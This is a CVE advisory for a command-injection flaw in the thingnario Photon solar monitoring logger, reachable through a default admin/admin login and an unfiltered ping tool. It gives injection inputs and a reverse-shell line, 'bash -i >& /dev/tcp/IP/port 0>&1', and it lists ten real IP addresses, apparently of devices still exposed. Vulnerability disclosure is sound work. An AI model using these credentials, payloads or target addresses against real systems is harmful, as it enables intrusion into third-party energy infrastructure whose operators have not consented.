advisory_thingnario_photon

advisory.md

[CVE ID] CVE-2023-46055 [PRODUCT] thingnario-photon [VERSION] 1.0 [VULN TYPE] Remote Command Execute [DESCRIPTION] https://www.thingnario.com/ Thingnairo PV Monitoring Solution means that the Photon product collects data and alerts from solar power plants and immediately sends the data to a display platform via an API, so users can receive instant production data and information without delay, which is sold in Taiwan and Southeast Asia. The vulnerability is generated by the data collector (logger) in the product. Below is a description of the data aggregator from the official website, in which the default password is exposed. https://thingnario-service.zendesk.com/hc/zh-tw/articles/13402230828185-%E5%A6%82%E4%BD%95%E5%B0%87%E8%B3%87%E6%96%99%E8%92%90%E9%9B%86%E5%99%A8%E8%A8%AD%E5%AE%9A%E7%82%BA%E5%9B%BA%E5%AE%9AIP- This vulnerability allows an attacker to enter the backend using the commonly known weak password admin/admin on the "thingnario Logger Maintenance Webpage" page that can be collected in the fofa/shodan. The ping function in the backend application does not properly validate, filter or escape user-supplied input data, but instead passes it directly to the underlying system command execution commands. An attacker could use this ping function to inject malicious commands. poc：click "Network Setting"--->"ping tool" and input "127.0.0.1|" or "127.0.0.1 &&" follows the command you want to execute(for example:127.0.0.1|bash -i >& /dev/tcp/IP/port 0>&1)
living_example_url: http://106.105.138.247 http://61.216.165.68 http://60.248.238.201 http://60.249.195.163 http://61.221.229.121 http://210.61.177.216 http://210.61.177.215 http://59.125.208.240 http://211.75.227.175 http://211.72.95.251